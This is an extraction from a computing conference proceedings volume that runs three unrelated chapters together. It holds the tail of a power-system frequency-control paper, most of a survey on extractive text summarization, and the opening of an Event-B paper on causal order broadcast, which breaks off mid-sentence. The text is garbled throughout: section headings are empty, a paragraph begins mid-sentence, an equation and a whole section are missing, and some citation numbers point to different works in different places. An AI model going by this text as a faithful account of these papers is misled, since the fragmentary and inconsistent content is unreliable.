Hence, the overall response of the proposed method for both controllers is superior. Table 2 illustrates the parameter variations associated with the proposed hFPA-PS:PIPD with possible combinations in an interdependent multisource power system connected through an AC tie-line. It is evident from Table 2 that the ITAE is minimized along with control of the area frequency and the power flow in the connected line. The settling time is also minimized with the application of the proffered algorithm for the PID and PIPD controller structures.
The modified gains of the PID and PIPD for the connected AC-DC line are presented in Table 3. The performance indices comparison for the considered system is done in Table 4 between the differential evolution algorithm-based DE:I, DE:PI and DE:PID and the proposed hFPA-PS:I, hFPA-PS:PI, hFPA-PS:PID and hFPA-PS:PIPD. The following indices, i.e., ITAE, PO (Δf 1,2), PU (Δf 1,2) and ST of area 1, area 2 and the power variations in the connected line, are presented to analyze the AC-DC interdependent system via the tie-line. Again, the performance of hFPA-PS:PIPD is found to be better in terms of minimizing all these parameters with respect to the other combinations. In Fig. 5a, b, the changes in frequency can be perceived, and it is depicted that the area frequencies in the case of the AC-DC tie-line take more time to settle down than for the system with only the
Fig. 5 Dynamic responses: frequency variations in a area-1, b area-2; c power variations in connected areas
4 Conclusions
Automatic Extractive Summarization
for English Text: A Brief Survey
Abstract In recent years, owing to the popularity of the Internet, digital documents have been
growing at an exponential rate on the Web. To save time and quickly grasp the content of
document(s), an automatic text summarization system is required, because manual
summarization takes time, effort, and cost. A summary contains key phrases and other
essential related text with no alteration of the key information or the general context of the
source document(s). Text summarization research began in 1958, and researchers continue
to try to improve the quality of summaries. The summarization process is either extractive
or abstractive. Extractive text summarization extracts the most appropriate
sentences, phrases, or words from the text/document(s) and then incorporates them into the
summary, while an abstractive text summarization system produces a summary from
phrases other than those in the input text/document(s). This review paper describes
preprocessing, features, methods, evaluations, and future directions in extractive
text summarization research. This study describes the advantages and shortcomings
of each method, compares them using precision, recall, and F-score, and finds
that deep learning-based methods produce excellent results when adequate training
summaries are available.
1 Introduction
In today’s world, Internet users are increasing exponentially day by day, so large
amounts of information and documents, in digital form, are available online. It is
not an easy job to quickly and concisely find the corresponding information and
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 183
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_15
184 S. Dhankhar and M. K. Gupta
Fig. 1 Categorization factors of text summarization
A monolingual summarization system generates summaries in the same language as the input
language, while multilingual systems accept documents in different languages and generate
the summary in one of the input document(s) languages. In cross-lingual systems,
the input document(s) language and the summary language are not the same.
A summary may be categorized as generic, domain-specific, or query-based
according to the purpose factor. A generic summary does not concern any particular class, subject,
or domain; it is for general use and covers all the information present in the docu-
ments, while domain-specific summaries refer to a particular area of interest. In contrast,
query-based systems produce summaries on the basis of a user query. Based
on the output factor, text summarization can be classified as extractive or abstrac-
tive. Extractive summaries are produced by selecting important words, phrases, and
sentences from the source document(s), while abstractive summaries are human-like
summaries that contain words, phrases, and sentences not featured in the source
document(s). In other words, advanced natural language processing techniques are
required to generate abstractive summaries [6].
Extractive summaries are easier to generate because the source document(s)
ensure baseline levels of grammaticality and accuracy. On the other hand, abstrac-
tive summaries are hard to generate because they require paraphrasing, generalization,
and real-world knowledge. This paper focuses on the features, techniques and meth-
ods, and evaluation of extractive text summarization.
The paper is arranged as follows: Sect. 2 describes extractive summarization.
Section 3 illustrates the various features of text summarization systems. Section 4
describes the different methods proposed in the literature for extractive text summa-
rization. Section 5 compares the different methods that we have presented in Sect. 4.
Section 6 introduces the various performance metrics for evaluating methods for
extractive text summarization, and Sect. 7 concludes the paper and presents future
directions for research into extractive text summarization.
Features can be categorized as word-level and sentence-level [7]. Word-level features
score each word, sentence-level features score each sentence, and the
high-scoring sentences are then extracted to produce a summary [8]. Table 1 lists the different
features used by researchers in recent times.
This section addresses the different techniques and methods of extractive text sum-
marization used over time by different researchers to increase the quality of the
summary. We describe and briefly illustrate each of these methods in the rest of
this section.
4.1 Statistical-Based
This class of methods uses statistical techniques to identify important sentences or words
in the document(s). These techniques assign weights to sentences or words without
considering the meaning of, or the relations between, sentences or words. Some statistical
techniques are word probability [1, 9], TF-IDF [7, 10, 11], title word [12, 13], proper
noun [12, 13], thematic word [12], keywords [13, 14], numerical data [12, 13], sentence
position [7, 12], and sentence length [7, 12].
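As an illustration of the statistical approach, the sketch below scores sentences by the average TF-IDF of their words and extracts the highest-scoring ones. The function names and the averaging scheme are our own illustrative choices, not taken from the cited papers:

```python
import math
from collections import Counter

def tfidf_scores(sentences):
    """Score each sentence by the average TF-IDF of its words.

    `sentences` is a list of lists of lowercase word tokens.
    """
    n = len(sentences)
    # Document frequency: number of sentences containing each word.
    df = Counter(w for s in sentences for w in set(s))
    scores = []
    for s in sentences:
        tf = Counter(s)
        score = sum(tf[w] / len(s) * math.log(n / df[w]) for w in tf)
        scores.append(score / len(tf))
    return scores

def summarize(sentences, k=2):
    """Return the indices of the k highest-scoring sentences, in document order."""
    scores = tfidf_scores(sentences)
    top = sorted(range(len(sentences)), key=lambda i: scores[i], reverse=True)[:k]
    return sorted(top)
```

A real system would combine this with further features from Table 1, such as sentence position and sentence length.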
Automatic Extractive Summarization for English Text … 187
4.2 Graph-Based
Graph-based sentence-ranking methods are among the most important approaches and
have attracted the attention of many researchers in this area. Words or sentences are
represented as graph nodes, and edges connect nodes that are semantically
related. Two essential graph-based techniques that provide promising results for
ranking sentences are TextRank [15] and LexRank [16]. Both represent the
sentences of the document(s) as vertices in a weighted undirected graph and then draw edges
between sentence pairs based on the similarity between them. Applying
the PageRank [17] algorithm to this graph, the system chooses significant sentences
via a random walk on the graph.
GraphSum, a general-purpose summarizer based on a graph model, reveals
multi-word similarities by examining association rules [18].
Alzuhair and Al-Dhelaan [19] developed an improved weighting scheme by com-
bining several measures to determine the similarity of two sentences, namely the Jaccard
similarity coefficient, TF-IDF, cosine similarity, and topic-signature similarity, and then
applying the PageRank algorithm to the combined similarity measure.
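The ranking idea behind these methods can be sketched as follows; this is a simplified TextRank-style computation (cosine similarity over bags of words plus plain power-iteration PageRank), not the exact formulation of [15] or [16]:

```python
import math
from collections import Counter

def cosine(a, b):
    """Cosine similarity between two bag-of-words Counters."""
    dot = sum(a[w] * b[w] for w in a)
    na = math.sqrt(sum(v * v for v in a.values()))
    nb = math.sqrt(sum(v * v for v in b.values()))
    return dot / (na * nb) if na and nb else 0.0

def rank_sentences(sentences, d=0.85, iters=50):
    """TextRank-style ranking: power iteration of PageRank on a weighted,
    undirected sentence-similarity graph built from token lists."""
    n = len(sentences)
    bags = [Counter(s) for s in sentences]
    w = [[cosine(bags[i], bags[j]) if i != j else 0.0 for j in range(n)]
         for i in range(n)]
    out = [sum(row) for row in w]  # total edge weight leaving each node
    scores = [1.0 / n] * n
    for _ in range(iters):
        scores = [(1 - d) / n
                  + d * sum(w[j][i] / out[j] * scores[j]
                            for j in range(n) if out[j])
                  for i in range(n)]
    return scores
```

Sentences that are similar to many other sentences accumulate a higher score, and the top-scoring ones are selected for the summary.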
4.3 Semantic-Based
4.4 Fuzzy-Based
document summarization method based on conditional random fields (CRF), where
summarization is described as a sequence labeling problem. Support vector
regression (SVR) has been applied to query-focused multidocument summarization with a number of
specified features to locate the relevant sentences in the documents to be summarized
[34]. Fattah [35] proposed a multidocument hybrid machine learning model with
maximum entropy (ME), Naive Bayes, and a support vector machine (SVM). The
SVM classifier aims to find the optimal hyperplane between the classes “Summary”
and “Non-Summary” using its core function, which is defined in Eq. 2:
Methods based on neural networks (NN) have recently become popular for extrac-
tive summarization. Deep neural networks model and process information
through several nonlinear layers. Deep learning networks need a
huge amount of training data to learn powerful and semantically useful
representations, for example, convolutional neural networks (CNN) and recurrent neural net-
works (RNN); most deep learning approaches need labeled data to train
architectures with millions of learnable parameters.
Kågebäck et al. [38] use continuous vector representations, based on a recursive
autoencoder, to represent the sentences of multiple documents for extractive summarization,
evaluated on a standard dataset using the ROUGE measures.
Kim [39] trains a simple CNN with one convolution layer on top of word vectors from
an unsupervised neural language model. Yin and Pei [40] applied a CNN to represent the sentences
in a continuous vector space and then select sentences from the multidocument set by min-
imizing a cost based on “prestige” and “diversity”. In another related study, Zhong et al. [41]
solve the query-oriented multidocument summarization problem by
using an unsupervised deep learning model called query-oriented deep extraction
(QODE). The QODE model has three elements: extraction, summary generation,
and reconstruction validation. Finally, the most appropriate sentences
are selected using dynamic programming to create a summary.
Cheng and Lapata [43] develop a deep neural network-based hierarchical docu-
ment encoder and an attention-based content extractor for single-document extractive
summarization. Sentence representations are obtained using a single-layer CNN
with a max-over-time pooling operation and are then used as inputs to a standard
RNN that acquires document-level representations hierarchically. The highest-scoring
sentences are selected using a long short-term memory (LSTM) decoder.
Yousefi-Azar and Hamey [44] implemented an unsupervised deep neural network
that produces a query-based summary for a single document. Using a deep autoen-
coder (AE), they learn features from the term frequencies and add small random noise
to the local term frequencies used as the AE input; the resulting noisy AE
ensemble, the Ensemble Noisy Auto-Encoder (ENAE),
increases average recall by 11.2%. Nallapati et al. [45] present SummaRuNNer,
a two-layer bidirectional GRU-RNN sequence model for extractive text summarization treated as
sequential classification, where every sentence is visited sequentially in the original
order and a judgment is made as to whether or not to include it in the summary.
Yao et al. [46] present a reinforcement learning framework for extractive document
summarization that uses a hierarchical CNN/RNN network architecture not only to generate
detailed features but also to create a collection of candidate actions for a Deep Q-Network
(DQN). The DQN learns which sentence to pick
by approximating the Q-value function based on content, salience, and redun-
dancy.
More recent research using deep learning methods, by Joshi et al. [42], proposed
SummCoder, a generalized unsupervised deep learning framework for extractive text
summarization of a single document. The sentence score is based on the importance of
the sentence content, the sentence novelty, and the sentence position in the doc-
ument. The summary is obtained by choosing the top-scoring sentences, restricted
by the given summary length.
The most recent research using deep learning-based methods, by Anand and Wagh [47],
proposed two NN-based approaches for summarizing Indian legal
judgment documents. In the first approach, a single feed-forward NN
(FFNN) unit is made of an input layer, two hidden layers, and one output layer; the
architecture of this NN is shown in Fig. 3. The second approach uses a recurrent
LSTM-based NN that contains memory blocks known as LSTM cells, where each LSTM
cell consists of four interacting neural network layers.
6 Evaluation Metrics
Two types of evaluation metrics are used, based on text quality and on content.
In text quality evaluation, the main parameters for measuring the quality of the text
are: it must be grammatically correct, there must be no repetition of sentences (non-redundancy),
references must be clear, and the summary must contain coherent sentences and have some
structure.
Table 2 Comparison and evaluation of different methods (“–” means not defined; results are
precision / recall / F-score)
Statistical-based. Advantages: easy to implement. Limitations: lack of uniformity in the
summary, and important sentences may not be included in the summary. Results: [1, 9–11]
– / – / –.
Graph-based. Advantages: offers a greater interpretation of critical sentences. Limitations:
sentences in graphs are represented by bags of words, whose similarity measures cannot
recognize semantically identical sentences. Results: [16] – / 0.087 / –; [18] 0.099 / 0.093 /
0.097; [19] – / – / –.
Semantic-based. Advantages: semantically related sentences are generated by this method.
Limitations: uses the time-consuming SVD methodology, and the generated summary
depends on the consistency of the semantic representation of the source text. Results: [22]
0.554 / 0.542 / 0.548; [23] – / 0.05 / –; [24] – / 0.86 / –.
Fuzzy-based. Advantages: a fuzzy method resembles real-world problems, which are not a
world of two values (0 or 1). Limitations: there can be a real issue of repetition among the
chosen sentences in the summary, which affects summary accuracy; a redundancy reduction
technique is therefore required to enhance the accuracy of the final summary. Results: [27]
0.4734 / 0.4918 / 0.4824.
Intrinsic evaluations are further classified into two content-evaluation categories:
co-selection and content-based evaluation. Recall, precision, and F-score are the metrics
used for co-selection [51]. Let S_A represent the set of sentences in an automatically
generated summary and S_G the set of sentences in the gold summary.
Precision (P), recall (R), and F-score (F) can be expressed by the following equations:

P = |S_A ∩ S_G| / |S_A|   (3)

R = |S_A ∩ S_G| / |S_G|   (4)

F = (2 * P * R) / (P + R)   (5)
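The co-selection metrics translate directly into code; the sketch below treats the summaries as sets of sentences (the function name is illustrative):

```python
def co_selection_scores(auto_summary, gold_summary):
    """Precision, recall, and F-score for co-selection evaluation; the
    summaries are treated as sets of sentences."""
    sa, sg = set(auto_summary), set(gold_summary)
    overlap = len(sa & sg)       # |S_A intersect S_G|
    p = overlap / len(sa)        # precision
    r = overlap / len(sg)        # recall
    f = 2 * p * r / (p + r) if p + r else 0.0  # harmonic mean
    return p, r, f
```

For example, a four-sentence automatic summary sharing two sentences with a three-sentence gold summary yields P = 0.5, R = 2/3, and F = 4/7.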
The biggest issue with precision and recall is that two equally good automatically
generated summaries can be evaluated very differently. Saggion et al. [52] proposed
content-based evaluation methods that compare similarities among summaries: cosine
similarity, unit overlap based on unigrams or bi-grams, and the longest common
subsequence (LCS). The biggest disadvantage of these methods is the degree to which
their results correlate with human judgment.
“Recall-Oriented Understudy for Gisting Evaluation (ROUGE)” [51] is also
a content-based evaluation method; it uses n-gram matching to automatically compare
system-generated summaries with human-generated summaries. ROUGE contains
many packages for evaluating system-generated summaries, but here we discuss
only those commonly used by researchers:
• ROUGE-N: Here, N refers to the N-gram length. It is a recall-oriented
measure based on N-gram (mostly bi-gram and tri-gram) comparison. To cal-
culate the score, we take N consecutive words from the system-generated and
gold summaries, find the total number of matching N-grams between them, and lastly
divide by the number of N-grams in the gold summary. The drawback of this strategy is that
N consecutive words are required for a match.
• ROUGE-L: L stands for LCS. Unlike ROUGE-N, it automatically identifies the
longest in-sequence word matching, at the sentence level, between the system-
generated and the gold summaries. The final score is calculated by summing all the sen-
tence-level LCS scores; the longer the LCS of two summaries, the more similar
they are. This measure has two advantages: (1) it does not
require consecutive word matches, and (2) no predefined N-gram length is required.
The disadvantage of this measure is that it does not consider shorter sequences
in the final score.
• ROUGE-SU: SU stands for skip bi-gram and unigram. It counts skip bi-grams:
pairs of words in sentence order separated by an arbitrary distance. If the distance is
very large, it produces misleading bi-gram matches; therefore, a maximum
skip distance of 4 is used, i.e., ROUGE-SU4.
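The n-gram matching behind ROUGE-N and the LCS computation underlying ROUGE-L can be sketched as below; this illustrates the idea only and omits the stemming, tokenization, and multi-reference handling of the official ROUGE package:

```python
from collections import Counter

def rouge_n(system, gold, n=2):
    """Recall-oriented ROUGE-N: matched n-grams (with clipped counts)
    divided by the number of n-grams in the gold summary."""
    def ngrams(tokens):
        return Counter(tuple(tokens[i:i + n]) for i in range(len(tokens) - n + 1))
    sys_ng, gold_ng = ngrams(system), ngrams(gold)
    matched = sum(min(c, sys_ng[g]) for g, c in gold_ng.items())
    total = sum(gold_ng.values())
    return matched / total if total else 0.0

def lcs_len(a, b):
    """Length of the longest common subsequence (the core of ROUGE-L)."""
    dp = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i, x in enumerate(a, 1):
        for j, y in enumerate(b, 1):
            dp[i][j] = dp[i - 1][j - 1] + 1 if x == y else max(dp[i - 1][j], dp[i][j - 1])
    return dp[len(a)][len(b)]
```

Note how a single substituted word costs ROUGE-2 two bi-grams but costs ROUGE-L only one word of the common subsequence.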
The biggest disadvantage of ROUGE evaluation methods is that people may
disagree on the gold summaries because these summaries may be biased. Nevertheless,
ROUGE is widely used by researchers for evaluating automatically
generated summaries.
7 Conclusion
Text summarization is an important research subject because manual summarization is
time-intensive and costly given the vast volume of text on
the Internet. We concentrated on extractive summarization because it does not require
much linguistic knowledge, and we listed the different features used by
researchers in recent times; the most used features are sentence position,
sentence length, and TF-IDF. By comparing different methods of text sum-
marization, we conclude that deep learning methods outperform the others when enough training
data are available. Future research in text summarization includes improving widely
used features, finding features that are compatible with each other, and producing
grammatically accurate summaries.
References
1. Lunh, H. P. (1958). The automatic creation of literature abstracts. IBM Journal of Research
Development, 2(2), 159–165.
2. Allahyari, M., Pouriyeh, S., Assefi,M., Safaei, S., Elizabeth, D., Juan, B., & Kochut, K. (2017).
Text summarization techniques: A brief survey. International Journal of Advanced Computer
Science and Applications, 8(10).
3. Yogan J. K., Goh, O. S., Basiron, H., Choon, N. K., & Suppiah, P. C. (2016). A review on
automatic text summarization approaches. Journal of Computer Science, 12(4), 178–190.
4. Magdum, P. G., & Rathi, S. (2021). A survey on deep learning-based automatic text summa-
rization models. In Advances in Artificial Intelligence and Data Engineering (pp. 377–392).
Springer.
5. Saggion, H., & Poibeau, T. (2013). Automatic text summarization: Past, present and future. In
Multi-source, multilingual information extraction and summarization (pp. 3–21). Springer.
6. See, A., Liu, P. J., & Manning, C. D. (2017). Get to the point: Summarization with pointer-
generator networks. arXiv preprint arXiv:1704.04368.
7. Patel, D., Shah, S., & Chhinkaniwala, H. (2019). Fuzzy logic based multi document summa-
rization with improved sentence scoring and redundancy removal technique. Expert Systems
with Applications, 134, 167–177.
8. Wang, S., Zhao, X., Li, B., Ge, B., & Tang, D. (2017). Integrating extractive and abstrac-
tive models for long text summarization. In 2017 IEEE International Congress on Big Data
(BigData Congress) (pp. 305–312). IEEE.
9. Vanderwende, L., Suzuki, H., Brockett, C., & Nenkova, A. (2007). Beyond SumBasic: Task-
focused summarization with sentence simplification and lexical expansion. Information Pro-
cessing and Management, 43(6), 1606–1618.
10. Güran, A., Uysal, M., Ekinci, Y., & Güran, C. B. (2017). An additive FAHP based sentence
score function for text summarization. Information Technology and Control, 46(1), 53–69.
11. Mori, H., Yamanishi, R., & Nishihara, Y. (2018). Detection of words accepted to dynamic
abstracts focusing on local variation of word frequency. Procedia Computer Science, 126,
1442–1449.
12. Abbasi-ghalehtaki, R., Khotanlou, H., & Esmaeilpour, M. (2016). Fuzzy evolutionary cellular
learning automata model for text summarization. Swarm and Evolutionary Computation, 30,
11–26.
13. Gambhir, M., & Gupta, V. (2017). Recent automatic text summarization techniques: A survey.
Artificial Intelligence Review, 47(1), 1–66.
14. Gupta, V., & Kaur, N. (2016). A novel hybrid text summarization system for Punjabi text.
Cognitive Computation, 8(2), 261–277.
15. Mihalcea, R., & Tarau, P. (2004). TextRank: Bringing order into text. In Proceedings of the
2004 Conference on Empirical Methods in Natural Language Processing (pp. 404–411).
16. Radev, D. R., & Erkan, G. (2004). LexRank : Graph-based centrality as salience in text sum-
marization. Journal of Artificial Intelligence Research, 22(1), 457–479.
17. Brin, S., & Page, L. (1998). The anatomy of a large-scale hypertextual Web search engine
BT—Computer networks and ISDN systems. Computer Networks and ISDN Systems, 30(1–
7), 107–117.
18. Baralis, E., Cagliero, L., Mahoto, N., & Fiori, A. (2013). GraphSum: Discovering correlations
among multiple terms for graph-based summarization. Information Sciences, 249, 96–109.
19. Alzuhair, A., & Al-Dhelaan, M. (2019). An approach for combining multiple weighting
schemes and ranking methods in graph-based multi-document summarization. IEEE Access,
7, 120375–120386.
20. Deerwester, S., Harshman, R., Susan, T., George, W., & Thomas, K. (1990). Indexing by latent
semantic analysis. Journal Of THe American Society For Information Science, 41(6), 391–407.
21. Gong, Y., & Liu, X. (2001). Generic text summarization using relevance measure and latent
semantic analysis. In Proceedings of the 24th annual international ACM SIGIR conference on
research and development in IR (pp. 19–25).
22. John, A., Premjith, P. S., & Wilscy, M. (2017). Extractive multi-document summarization using
population-based multicriteria optimization. Expert Systems with Applications, 86, 385–397.
23. Al-Sabahi, K., Zhang, Z., Long, J., & Alwesabi, K. (2018). An enhanced latent semantic analy-
sis approach for Arabic document summarization. Arabian Journal for Science and Engineer-
ing, 43(12), 8079–8094.
24. Cagliero, L., Garza, P., & Baralis, E. (2019). ELSA: A multilingual document summariza-
tion algorithm based on frequent itemsets and latent semantic analysis. ACM Transactions on
Information Systems, 37(2), 1–33.
25. Zadeh, L. A. (1965). Fuzzy sets. Information and Control, 8(3), 338–353.
26. Khosravi,H., Eslami, E., Kyoomarsi, F., & Dehkordy, P. K. (2008). Optimizing text summa-
rization based on fuzzy logic. In Computer and Information Science (pp. 121–130). Springer.
27. Esther Hannah, M., & Geetha. (2011). Automatic extractive text summarization based on fuzzy
logic: A sentence oriented approach. In International Conference on Swarm, Evolutionary, and
Memetic Computing (pp. 530–538). Springer.
28. Malallah, S., & Ali, Z. H. (2017). Multi-document text summarization using fuzzy logic and
association rule mining. IASJ, 41, 241–258.
29. Goularte, F. B., Nassar, S. M., Fileto, R., & Saggion, H. (2019). A text summarization method
based on fuzzy rules and applicable to automated assessment. Expert Systems with Applications,
115, 264–275.
30. Van Lierde, Hadrien, & Chow, Tommy. (2019). Learning with fuzzy hypergraphs: A topical
approach to query-oriented text summarization. Inf. Sci., 496, 212–224.
31. Neto, J. L., Freitas, A. A., & Kaestner, C. A. A. (2002). Automatic text summarization using
a machine learning approach. In Brazilian symposium on artificial intelligence (pp. 205–215).
Springer.
32. Conroy, J. M., & O’leary, D. P. (2001). Text summarization via hidden markov models. In Pro-
ceedings of the 24th annual international ACM SIGIR conference on research and development
in information retrieval (pp. 406–407).
33. Shen, D., Sun, J.-T., Li, H., Yang, Q., & Chen, Z. (2004). Document summarization using
conditional random fields (pp. 2862–2867).
34. Ouyang, Y., Li, W., Li, S., & Qin, L. (2011). Applying regression models to query-focused
multi-document summarization. Information Processing and Management, 47(2), 227–237.
35. Fattah, M. A. (2014). A hybrid machine learning model for multi-document summarization.
Applied Intelligence, 40(4), 592–600.
36. Verma, P., & Om, H. (2019). MCRMR : Maximum coverage and relevancy with minimal
redundancy based multi-document summarization. Expert Systems With Applications, 120,
43–56.
37. Khan, R., Qian, Y., & Naeem, S. (2019). Extractive based text summarization using k-means
and tf-idf. International Journal of Information Engineering & Electronic Business, 11(3),
38. Kågebäck, M., Mogren, O., Tahmasebi, N., & Dubhashi, D. (2014). Extractive summarization
using continuous vector space models. In Proceedings of the 2nd Workshop on CVSC (pp.
31–39).
39. Kim, Y. (2014). Convolutional neural networks for sentence classification. In Proceedings of
the 2014 Conference on Empirical Methods in Natural Language Processing (pp. 1746–1751).
40. Yin, W., & Pei, Y. (2015). Optimizing sentence modeling and selection for document summa-
rization. In Proceedings of the 24th International Joint Conference on Artificial Intelligence
(IJCAI) (pp. 1383–1389).
41. Zhong, S., Liu, Y., Li, B., & Long, J. (2015). Query-oriented unsupervised multi-document
summarization via deep learning model. Expert Systems With Applications, 42(21), 8146–8155.
42. Joshi, A., Fidalgo, E., Alegre, E., Fernández-robles, L. (2019). SummCoder : An unsupervised
framework for extractive text summarization based on deep auto-encoders. Expert Systems
With Applications, 129, 200–215.
43. Cheng, J., & Lapata, M. (2016). Neural summarization by extracting sentences and words (pp.
484–494).
44. Yousefi-azar, M., & Hamey, L. (2017). Text summarization using unsupervised deep learning.
Expert Systems With Applications, 68, 93–105.
45. Nallapati, R., Zhai, F., & Zhou, B. (2017). Summarunner: A recurrent neural network based
sequence model for extractive summarization of documents. In Proceedings of the AAAI Con-
ference on Artificial Intelligence (Vol. 31).
46. Yao, K., Zhang, L., Luo, T., & Yanjun, W. (2018). Neurocomputing deep reinforcement learning
for extractive document summarization. Neurocomputing, 284, 52–62.
47. Anand, D., & Wagh, R. (2019). Effective deep learning approaches for summarization of legal
texts. Journal of King Saud University-Computer and Information Sciences.
48. Mani, I., House, D., Firmin, T., & Sundheim, B. (2002). Summac: A text summarization
evaluation. Natural Language Engineering, 8(1), 43–68.
49. Over, P., Dang, H., & Harman, D. (2007). DUC in context. Information Processing and Man-
agement, 43(6), 1506–1520.
50. Jones, K. S. (1998). Automatic summarising: Factors and directions (pp. 1–21).
51. Lin, C. Y. (2004). ROUGE: A package for automatic evaluation of summaries. In Text
Summarization Branches Out: Proceedings of the ACL-04 Workshop (pp. 74–81).
52. Saggion, H., Radev, D., Teufel, S., & Lam, W. (2002). Meta-evaluation of summaries in a cross-
lingual environment using content-based metrics. In COLING 2002: The 19th International
Conference on Computational Linguistics.
Formal Verification of Liveness
Properties in Causal Order Broadcast
Systems Using Event-B
Abstract Distributed systems have complex designs that are difficult to under-
stand and verify. A rigorous specification of such systems using mathematical tech-
niques such as formal methods is required to understand their precise behavior. The safety
property implies that the system is free from deadlocks and safe with respect to its
invariants, while the liveness property ensures that the system eventually makes
progress. Group communication protocols are among the building blocks of
reliable distributed-system applications. One such message-ordering protocol is
causal order broadcast, in which message delivery at the various processes takes place
in causal order. This paper presents how liveness properties are preserved
by message passing in causal order using Event-B. An incremental model of causal-
order-based message passing is constructed using the Event-B specification. The prop-
erties of causal order broadcast are first specified using an abstract model, and then
details are added with each refinement step. The liveness property is ascertained by
ensuring enabledness preservation and non-divergence among the various refinements,
and it is expressed as invariants in the model of the causal order broadcast system.
P. Yadav (B)
Dr. A.P.J. Abdul Kalam Technical University, Lucknow 226021, India
e-mail: poojayadav255@gmail.com
R. Suryavanshi
Pranveer Singh Institute of Technology, Kanpur 209305, India
e-mail: raghuraj.suryavanshi@gmail.com
D. Yadav
Institute of Engineering and Technology, Lucknow 226021, India
e-mail: dsyadav@ietlucknow.ac.in
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 199
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_16
200 P. Yadav et al.
1 Introduction
The two main components of an Event-B model [5, 6] are contexts and machines [7].
The static part of the model is comprised of contexts which contain sets, axioms, and
constants. Sets can be of two types, carrier, or enumerated. The properties of these
sets and constants are defined by axioms. The behavioral properties of the model are
represented by machines which contain the system variables, theorems, invariants,
and events. The state of the machine is defined by variables. The constraints that
must be applied on the machine’s variables are represented by the invariants of the
machine [4]. First, an abstract machine is modeled, and then, it is refined to intro-
duce more concrete specifications [8]. Every state of the machine during execution
must satisfy all the invariants [9]. The events in the model define how the state of the
machine may evolve. An event comprises guards and actions. The list of actions of
an event is invoked only if all the guards associated with that event become true [10].
Proof obligations are used to verify the properties of a machine through consistency
checking and refinement checking [7, 11]. Event-B tools discharge proof obligations
using automatic provers or through user interaction [7]. A detailed description of the
notations of Event-B is given in [12]. Several B tools are available, such as Rodin [7],
B-Toolkit [13], Atelier B [14], and Click'n'Prove [15]. We have used the Rodin platform
[7, 16] for our research work. It has various embedded plugins such as model checkers,
provers, a proof-obligation generator, and UML transformers. Rodin provides a platform
for consistency and refinement checking through generation and discharge of proof
obligations.
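The guard/action semantics sketched above can be illustrated with a small Python simulation. This is our own illustrative rendering, not Event-B or Rodin syntax, and the toy counter machine below is not from the paper's model: an event fires only when all of its guards hold, and every reachable state must satisfy the invariants.

```python
# Illustrative sketch of Event-B execution semantics (not Rodin syntax):
# an event fires only if all its guards hold; invariants must hold in
# every state reached. All names here are hypothetical examples.

def run(state, events, invariants, steps):
    """Fire enabled events for up to `steps` steps, checking invariants."""
    assert all(inv(state) for inv in invariants), "initial state violates invariants"
    for _ in range(steps):
        enabled = [e for e in events if all(g(state) for g in e["guards"])]
        if not enabled:
            break  # no event is enabled: the machine stops
        enabled[0]["action"](state)
        # consistency: every reachable state must satisfy all invariants
        assert all(inv(state) for inv in invariants)
    return state

# Toy machine: a counter that may only grow up to a bound of 3.
state = {"n": 0}
events = [{"name": "inc",
           "guards": [lambda s: s["n"] < 3],       # guard
           "action": lambda s: s.update(n=s["n"] + 1)}]  # action
invariants = [lambda s: 0 <= s["n"] <= 3]
final = run(state, events, invariants, steps=10)
print(final["n"])  # stops at the bound
```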
The causal order was formally defined by Lamport in [17]. The causal order property
is a combination of FIFO order and local order property [18]. Birman, Schiper, and
Stephenson proposed causal ordering of messages in [19]. FIFO order property [20]
states that “if any site Si broadcasts a message M1 before broadcasting message M2
then each receiving site delivers M1 before M2.” Local order property [20] states
that “if any site Si delivers message M1 before broadcasting message M2 then every
receiving site delivers M1 before M2.” The causal order property states that “if
broadcasting of a message M1 causally precedes broadcasting of a message M2 then
delivery of message M1 at each site should be done before the delivery of message
M2.”
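The FIFO order property quoted above can be spot-checked over small delivery logs with a few lines of Python. This is an illustrative sketch of the property only; the log representation and function name are our own assumptions, not part of the Event-B model.

```python
# Illustrative check of the FIFO order property: if a site broadcasts M1
# before M2, every receiving site must deliver M1 before M2.
def fifo_order_ok(broadcasts, deliveries):
    """broadcasts: site -> messages in broadcast order;
    deliveries: site -> messages in delivery order."""
    for msgs in broadcasts.values():
        for delivered in deliveries.values():
            pos = {m: i for i, m in enumerate(delivered)}
            ranks = [pos[m] for m in msgs if m in pos]
            if ranks != sorted(ranks):   # delivery order disagrees with broadcast order
                return False
    return True

broadcasts = {"S1": ["M1", "M2"]}
print(fifo_order_ok(broadcasts, {"S2": ["M1", "M2"]}))  # True
print(fifo_order_ok(broadcasts, {"S2": ["M2", "M1"]}))  # False: M2 overtook M1
```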
The remaining paper is organized as follows: Section 2 summarizes the literature
review, Section 3 gives the formal analysis of liveness property in causal order broad-
cast systems, Sections 4 and 5 demonstrate the analysis of enabledness preservation
and non-divergence property, respectively, in causal order broadcast systems, and
Section 6 provides a conclusion to the work done.
2 Literature Review
Extensive research has been done in the field of formal modeling and verification
of various protocols related to distributed systems. Event-B is one such platform for the
formal development of distributed system protocols. Reference [12] demonstrates the formal
verification of atomic commitment of distributed transactions. The paper also addresses
the difficulties that arise when updates occur in a replicated database and the issues in
maintaining consistency among the various replicas of the database. Reference [10]
highlights the formal development of an incremental model of total order broadcast
in distributed transactions using Event-B. Formal verification of safety and liveness
properties in distributed transactions is presented in [23]. Formal development and
verification of causal order-based load balancing protocol using Event-B are shown
in [20]. The details of various message ordering properties such as causal order and
total order are given in [22]. The paper highlights various aspects of causal order
broadcast and total order broadcast through events and invariants. An abstract model
of causal order broadcast is developed, and then, it is refined by adding the details at
each refinement stage. In this paper, we take the work forward by demonstrating the
liveness properties of causal order message-passing systems by ensuring enabledness
preservation and non-divergence through various refinements of the causal order
broadcast model using Event-B and Rodin platform.
3 Formal Analysis of Liveness Property in Causal Order Broadcast Systems
The details of the Event-B model of causal order are given in [23]. First, an abstract
machine for reliable broadcast is developed, and then it is refined to an abstract causal
order model. In the next refinement, we proceed to vector clocks. The vector clock
rules replace the abstract causal order. The various stages of refinement of causal
order broadcast model are described below.
Abstract Machine: Figure 1 shows the abstract machine for causal order broadcast.
In the abstract machine, PROC and MSG are sets of processes and messages, respec-
